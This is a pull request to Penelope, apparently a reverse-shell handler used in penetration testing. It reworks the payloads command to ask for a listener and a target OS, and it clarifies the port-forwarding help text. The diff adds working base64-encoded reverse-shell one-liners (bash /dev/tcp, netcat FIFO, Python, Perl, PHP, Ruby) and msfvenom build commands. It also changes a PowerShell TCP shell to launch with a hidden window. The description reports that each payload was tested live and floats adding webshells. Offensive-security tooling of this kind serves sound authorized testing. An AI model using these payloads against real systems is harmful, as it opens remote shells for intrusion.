### PR TITLE
Clarify portfwd help and make payloads ask what you're targeting

### DIFF
--- a/penelope.py
+++ b/penelope.py
@@ -588,6 +588,18 @@ def ask(text):
 			print("^C")
 			return ' '
 
+def ask_target_os():
+	"""Ask which OS the target runs, so we only show payloads that can run there.
+	Returns None if the question was not answered (empty input, Ctrl-C, or no tty)."""
+	while True:
+		answer = ask("Target OS? (linux/windows/both): ").strip().lower()
+		if not answer:
+			return None
+		for choice in ('linux', 'windows', 'both'):
+			if choice.startswith(answer):
+				return choice
+		logger.warning("Answer 'linux', 'windows' or 'both'")
+
 def my_input(text="", histfile=None, histlen=None, completer=lambda text, state: None, completer_delims=None):
 	readline_quote_chars_saved = None
 	if threading.current_thread().name == 'MainThread':
@@ -1676,13 +1688,20 @@ class MainMenu(BetterCMD):
 		"""
 		[interface_name]
 		Show example reverse-shell commands for the active listeners
+		Asks whether the target runs Linux or Windows first, so you only get the payloads that
+		can actually run there. Answer "both" for the full list.
 		"""
-		if core.listeners:
-			print()
-			for listener in list(core.listeners.values()):
-				print(listener.payloads(line))
-		else:
+		if not core.listeners:
 			cmdlogger.warning("No Listeners to show payloads")
+			return
+
+		target_os = ask_target_os()
+		if not target_os:
+			return
+
+		print()
+		for listener in list(core.listeners.values()):
+			print(listener.payloads(line, target_os))
 
 	def do_Interfaces(self, line):
 		"""
@@ -2395,7 +2414,7 @@ class TCPListener:
 		else:
 			logger.warning(f"Stopping {self}")
 
-	def payloads(self, interface_filter=None):
+	def payloads(self, interface_filter=None, target_os='both'):
 		pairs = Interfaces().pairs
 		name_of_ip = {ip: name for name, ip in pairs}
 		presets = [
@@ -2426,22 +2445,28 @@ class TCPListener:
 				iface_name = paint(iface_name).GREEN_black
 			interface_count += 1
 			output.extend((f'➤  {iface_name} → {str(paint(ip).cyan)}:{str(paint(port).orange)}', ''))
-			output.append(str(paint("Bash TCP").UNDERLINE))
-			output.append(f"printf {base64.b64encode(presets[0].format(ip, port).encode()).decode()}|base64 -d|bash")
-			output.append("")
-			output.append(str(paint("Netcat + named pipe").UNDERLINE))
-			output.append(f"printf {base64.b64encode(presets[1].format(ip, port).encode()).decode()}|base64 -d|sh")
-			output.append("")
-			output.append(str(paint("Powershell").UNDERLINE))
-			output.append("cmd /c powershell -e " + base64.b64encode(presets[2].format(ip, port).encode("utf-16le")).decode())
+			blocks = []
+			if target_os in ('linux', 'both'):
+				blocks.append(("Bash TCP",
+					f"printf {base64.b64encode(presets[0].format(ip, port).encode()).decode()}|base64 -d|bash"))
+				blocks.append(("Netcat + named pipe",
+					f"printf {base64.b64encode(presets[1].format(ip, port).encode()).decode()}|base64 -d|sh"))
+			if target_os in ('windows', 'both'):
+				blocks.append(("Powershell",
+					"cmd /c powershell -e " + base64.b64encode(presets[2].format(ip, port).encode("utf-16le")).decode()))
+			blocks.append(("Metasploit", "\n".join((
+				"set PAYLOAD generic/shell_reverse_tcp",
+				f"set LHOST {ip}",
+				f"set LPORT {port}",
+				"set DisablePayloadHandler true"
+			))))
 
-			output.extend(dedent(f"""
-			{paint('Metasploit').UNDERLINE}
-			set PAYLOAD generic/shell_reverse_tcp
-			set LHOST {ip}
-			set LPORT {port}
-			set DisablePayloadHandler true
-			""").split("\n"))
+			for index, (title, body) in enumerate(blocks):
+				if index:
+					output.append("")
+				output.append(str(paint(title).UNDERLINE))
+				output.append(body)
+			output.append("")
 
 		output.append("─" * 80)
 		if not interface_count:
@@ -7260,9 +7285,11 @@ def listener_menu():
 				break
 			elif command == 'p':
 				restore_tty()
-				print()
-				for listener in list(core.listeners.values()):
-					print(listener.payloads(), end='\n\n')
+				target_os = ask_target_os()
+				if target_os:
+					print()
+					for listener in list(core.listeners.values()):
+						print(listener.payloads(None, target_os), end='\n\n')
 			elif command == '\x0C':
 				os.system("clear")
 			elif command in ('q', '\x03'):

--- a/penelope.py
+++ b/penelope.py
@@ -2469,7 +2469,7 @@ class TCPListener:
 				blocks.append(("Msfvenom ELF", presets["msfvenom_elf"].format(ip, port)))
 			if target_os in ('windows', 'both'):
 				blocks.append(("Powershell",
-					"cmd /c powershell -e " + base64.b64encode(presets["powershell"].format(ip, port).encode("utf-16le")).decode()))
+					"cmd /c powershell -nop -w hidden -e " + base64.b64encode(presets["powershell"].format(ip, port).encode("utf-16le")).decode()))
 				blocks.append(("Msfvenom EXE", presets["msfvenom_exe"].format(ip, port)))
 			blocks.append(("Metasploit", "\n".join((
 				"set PAYLOAD generic/shell_reverse_tcp",

--- a/penelope.py
+++ b/penelope.py
@@ -1212,15 +1212,19 @@ class MainMenu(BetterCMD):
 
 	def do_portfwd(self, line):
 		"""
-		[<host:port> (->|<-) <host:port> | stop <id>]
-		Local and Remote port forwarding
+		[<local host:port> -> <remote host:port> | stop <id|*>]
+		Forward a local port through the session to a host the target can reach
+		The left side is on your machine and the right side is resolved by the target: Penelope
+		listens on the left, and each connection is tunneled through the session so that the
+		target is the one connecting to the right. Select a session first with "use <ID>".
 
 		Examples:
 
-			portfwd					Show active Port Forwards
-			portfwd -> 192.168.0.1:80		Forward 127.0.0.1:80 to 192.168.0.1:80
-			portfwd 8888 -> 192.168.0.1:80		Forward 127.0.0.1:8888 to 192.168.0.1:80
-			portfwd 0.0.0.0:8080 -> 192.168.0.1:80	Forward 0.0.0.0:8080 to 192.168.0.1:80
+			portfwd -> 127.0.0.1:3306		Reach the target's own MySQL on your 127.0.0.1:3306
+			portfwd 3307 -> 127.0.0.1:3306		Same, but listen on your 127.0.0.1:3307
+			portfwd -> 192.168.0.1:80		Reach 192.168.0.1:80 from the target's network, on your 127.0.0.1:80
+			portfwd 0.0.0.0:8080 -> 192.168.0.1:80	Same, but listen on 0.0.0.0:8080 so others can use it too
+			portfwd					List the active Port Forwards and their IDs
 			portfwd stop 1				Stop the Port Forward with ID 1
 			portfwd stop *				Stop all Port Forwards
 		"""

--- a/penelope.py
+++ b/penelope.py
@@ -588,17 +588,44 @@ def ask(text):
 			print("^C")
 			return ' '
 
+def ask_listener():
+	"""Pick which Listener the payloads should point at. Returns the chosen Listeners,
+	or None if the question was not answered. Does not ask when there is only one."""
+	listeners = list(core.listeners.values())
+	if len(listeners) < 2:
+		return listeners
+
+	table = Table(joinchar=' | ')
+	table.header = [paint(header).orange for header in ('ID', 'Host', 'Port')]
+	for listener in listeners:
+		table += [listener.id, listener.host, listener.port]
+	print('\n', indent(str(table), '  '), '\n', sep='')
+
+	while True:
+		answer = ask("Listener ID? (<id>/*): ").strip()
+		if not answer:
+			return None
+		if answer == '*':
+			return listeners
+		try:
+			return [core.listeners[int(answer)]]
+		except (KeyError, ValueError):
+			logger.warning("Invalid Listener ID")
+
 def ask_target_os():
 	"""Ask which OS the target runs, so we only show payloads that can run there.
 	Returns None if the question was not answered (empty input, Ctrl-C, or no tty)."""
+	numbered = {'1': 'linux', '2': 'windows', '3': 'both'}
 	while True:
-		answer = ask("Target OS? (linux/windows/both): ").strip().lower()
+		answer = ask("Target OS? (1/linux, 2/windows, 3/both): ").strip().lower()
 		if not answer:
 			return None
+		if answer in numbered:
+			return numbered[answer]
 		for choice in ('linux', 'windows', 'both'):
 			if choice.startswith(answer):
 				return choice
-		logger.warning("Answer 'linux', 'windows' or 'both'")
+		logger.warning("Answer 1/linux, 2/windows or 3/both")
 
 def my_input(text="", histfile=None, histlen=None, completer=lambda text, state: None, completer_delims=None):
 	readline_quote_chars_saved = None
@@ -1688,11 +1715,16 @@ class MainMenu(BetterCMD):
 		"""
 		[interface_name]
 		Show example reverse-shell commands for the active listeners
-		Asks whether the target runs Linux or Windows first, so you only get the payloads that
-		can actually run there. Answer "both" for the full list.
+		Asks which Listener to point at, and whether the target runs Linux or Windows, so you
+		only get the payloads that can actually run there. Answer "*" for every Listener and
+		"both" for every payload.
 		"""
 		if not core.listeners:
 			cmdlogger.warning("No Listeners to show payloads")
+			return
+
+		listeners = ask_listener()
+		if not listeners:
 			return
 
 		target_os = ask_target_os()
@@ -1700,7 +1732,7 @@ class MainMenu(BetterCMD):
 			return
 
 		print()
-		for listener in list(core.listeners.values()):
+		for listener in listeners:
 			print(listener.payloads(line, target_os))
 
 	def do_Interfaces(self, line):
@@ -7302,10 +7334,11 @@ def listener_menu():
 				break
 			elif command == 'p':
 				restore_tty()
-				target_os = ask_target_os()
+				listeners = ask_listener()
+				target_os = ask_target_os() if listeners else None
 				if target_os:
 					print()
-					for listener in list(core.listeners.values()):
+					for listener in listeners:
 						print(listener.payloads(None, target_os), end='\n\n')
 			elif command == '\x0C':
 				os.system("clear")

--- a/penelope.py
+++ b/penelope.py
@@ -2417,11 +2417,23 @@ class TCPListener:
 	def payloads(self, interface_filter=None, target_os='both'):
 		pairs = Interfaces().pairs
 		name_of_ip = {ip: name for name, ip in pairs}
-		presets = [
-			"(bash >& /dev/tcp/{}/{} 0>&1) &",
-			"(rm /tmp/_;mkfifo /tmp/_;cat /tmp/_|sh 2>&1|nc {} {} >/tmp/_) >/dev/null 2>&1 &",
-			'$client = New-Object System.Net.Sockets.TCPClient("{}",{});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()' # Taken from revshells.com
-		]
+		presets = {
+			"bash": "(bash >& /dev/tcp/{}/{} 0>&1) &",
+			"nc_fifo": "(rm /tmp/_;mkfifo /tmp/_;cat /tmp/_|sh 2>&1|nc {} {} >/tmp/_) >/dev/null 2>&1 &",
+			"python3": '(python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{}",{}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh"])\') >/dev/null 2>&1 &',
+			"perl": '(perl -e \'use Socket;$i="{}";$p={};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh");}};\') >/dev/null 2>&1 &',
+			"php": '(php -r \'$sock=fsockopen("{}",{});exec("/bin/sh <&3 >&3 2>&3");\') >/dev/null 2>&1 &',
+			"ruby": '(ruby -rsocket -e \'c=TCPSocket.new("{}",{});$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);exec "/bin/sh"\') >/dev/null 2>&1 &',
+			"msfvenom_elf": "msfvenom -p linux/x64/shell_reverse_tcp LHOST={} LPORT={} -f elf -o shell.elf",
+			"msfvenom_exe": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={} LPORT={} -f exe -o shell.exe",
+			"powershell": '$client = New-Object System.Net.Sockets.TCPClient("{}",{});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()', # Taken from revshells.com
+		}
+
+		def oneliner(name, shell, ip, port):
+			# The target gets the payload base64 encoded, so quoting survives whatever
+			# mangles it on the way in.
+			payload = base64.b64encode(presets[name].format(ip, port).encode()).decode()
+			return f"printf {payload}|base64 -d|{shell}"
 
 		output = [str(paint(self).white_MAGENTA)]
 		output.append("")
@@ -2447,13 +2459,18 @@ class TCPListener:
 			output.extend((f'➤  {iface_name} → {str(paint(ip).cyan)}:{str(paint(port).orange)}', ''))
 			blocks = []
 			if target_os in ('linux', 'both'):
-				blocks.append(("Bash TCP",
-					f"printf {base64.b64encode(presets[0].format(ip, port).encode()).decode()}|base64 -d|bash"))
-				blocks.append(("Netcat + named pipe",
-					f"printf {base64.b64encode(presets[1].format(ip, port).encode()).decode()}|base64 -d|sh"))
+				blocks.append(("Bash TCP", oneliner("bash", "bash", ip, port)))
+				blocks.append(("Netcat + named pipe", oneliner("nc_fifo", "sh", ip, port)))
+				blocks.append(("Python3", oneliner("python3", "sh", ip, port)))
+				blocks.append(("Perl", oneliner("perl", "sh", ip, port)))
+				blocks.append(("PHP", oneliner("php", "sh", ip, port)))
+				blocks.append(("Ruby", oneliner("ruby", "sh", ip, port)))
+				# msfvenom runs on this machine, not on the target, so it is printed as is.
+				blocks.append(("Msfvenom ELF", presets["msfvenom_elf"].format(ip, port)))
 			if target_os in ('windows', 'both'):
 				blocks.append(("Powershell",
-					"cmd /c powershell -e " + base64.b64encode(presets[2].format(ip, port).encode("utf-16le")).decode()))
+					"cmd /c powershell -e " + base64.b64encode(presets["powershell"].format(ip, port).encode("utf-16le")).decode()))
+				blocks.append(("Msfvenom EXE", presets["msfvenom_exe"].format(ip, port)))
 			blocks.append(("Metasploit", "\n".join((
 				"set PAYLOAD generic/shell_reverse_tcp",
 				f"set LHOST {ip}",


### PR DESCRIPTION
Sorry, a huge edit, so I'm gonna try to explain briefly what I did, please give me you opinion about the follow up at the end as well :D
Edit: gonna add a new issue explaining more deeply what I mean.

Mainly, I did two things, both in penelope.py: portfwd's help no longer leaves you guessing which side of the arrow is which, and payloads asks what you're targeting instead of dumping everything at once. Happy to split into separate PRs if you'd rather review them apart.

Commit by commit:

4fc901e Clarify portfwd help. The help never said which side of the arrow is which, so it wasn't obvious that the right-hand host:port is resolved by the target while the left-hand one is what you connect to yourself. Spelled that out, added an example forwarding a service on the target's own loopback (portfwd -> 127.0.0.1:3306), and moved the setup examples above the list/stop ones so the first thing you read is the command that actually sets a forward up. Also dropped <- from the syntax line since reverse forwarding bails out as not implemented, and wrote stop as <id|*> to match what the command accepts.

77d4bb0 Ask for the target OS before showing payloads. On a Linux box you scrolled past a PowerShell one-liner, on Windows you scrolled past two shell ones. Now it asks and prints only what can run there. The question is always asked and never guessed from an active session, since the listener you're generating for is usually not the box you're already on. An empty answer returns, so a Ctrl-C or a non-interactive run can't hang on the prompt. The listener menu's p hotkey goes through the same question, so both ways in share one code path. Per-interface blocks are now collected in a list before printing, because dropping one used to leave a stray blank line behind.

d7686c5 Add Python, Perl, PHP, Ruby and msfvenom payloads. Bash and the named-pipe netcat cover a lot of Linux targets but not all, and there was nothing to fall back on. Added those four one-liners, plus an msfvenom line per OS (ELF for Linux, EXE for Windows), printed unencoded because msfvenom runs on the handler rather than the target. They sit alongside the existing Metasploit block rather than replacing it: generic/shell_reverse_tcp has no platform of its own so msfvenom refuses to build a file from it, while msfvenom needs a concrete platform and can't be driven from inside an exploit module. The Ruby one uses $stdin.reopen rather than the classic f = TCPSocket.open(...).to_i; exec sprintf(...), because modern Ruby marks sockets close-on-exec and the old form hands /bin/sh a closed descriptor and dies with Bad file descriptor. presets became a dict here too, having been a list indexed by number that was already thin at three entries and unreadable at eight.

3429d9b Run the PowerShell payload with -nop -w hidden. It ran with the user's profile loaded, so a slow or broken profile could stall it before it ever connected, and it flashed a console window when fired interactively.

e9a1d56 Pick which Listener the payloads point at. With several listeners up you got a full set for each and had to scroll for the port you cared about. Now it shows the same ID/Host/Port table listeners prints and asks which one, with * for all. Skipped entirely when there's only one. The OS question also learned to take 1/2/3, so both questions accept a number, a full name, or a prefix:

  ID | Host      | Port
  1  | 127.0.0.1 | 4444
  2  | 127.0.0.1 | 8443

[?] Listener ID? (<id>/*): 2
[?] Target OS? (1/linux, 2/windows, 3/both): 2

* and both reproduce the old output exactly.

Related issue

No issue. Motivation is above: both commands made you work out things the tool already knew.

Type of change

- [ ] Bug fix
- [x] New feature
- [ ] Refactor (no behavior change)
- [] Documentation
- [ ] Other (describe below)

Checklist

- [x] My change keeps Penelope dependency-free (standard library only)
- [x] I tested this manually and described how below
- [x] I considered compatibility with older Python versions (3.6+)
- [x] I updated the README or help text if the change affects usage

How was this tested?

Ubuntu, Python 3.12, reverse-shell listener mode.

Payloads, actually fired rather than eyeballed. Each generated one-liner was run against a listener on 127.0.0.1 and id sent over the returned shell:

OK  Bash TCP              uid=1000(...)
OK  Netcat + named pipe   uid=1000(...)
OK  Python3               uid=1000(...)
OK  Perl                  uid=1000(...)
OK  PHP                   uid=1000(...)
OK  Ruby                  uid=1000(...)
OK  Msfvenom ELF          uid=1000(...)

Both msfvenom commands were run exactly as printed and produced a valid ELF 64-bit LSB executable and PE32+ executable ... for MS Windows.

PowerShell: the encoded payload connects and answers whoami under pwsh 7 with -nop. -w hidden could not be exercised here, since pwsh rejects -WindowStyle on Linux. It's a Windows PowerShell flag and the payload launches through cmd /c powershell, so it only ever reaches powershell.exe.

# Followup

A follow-up I'd like your read on before writing it: I'm thinking about adding a small set of webshells under extras/, in the same spirit as extras/exploit_examples/. The thought is that the gap this PR closes on the Windows side is really a delivery problem rather than a payload one, since the useful Windows one-liners (powercat, nc.exe) all assume something is hosting a file for the target to pull. A webshell drop is the other half of that story. Worth doing, or out of scope for Penelope?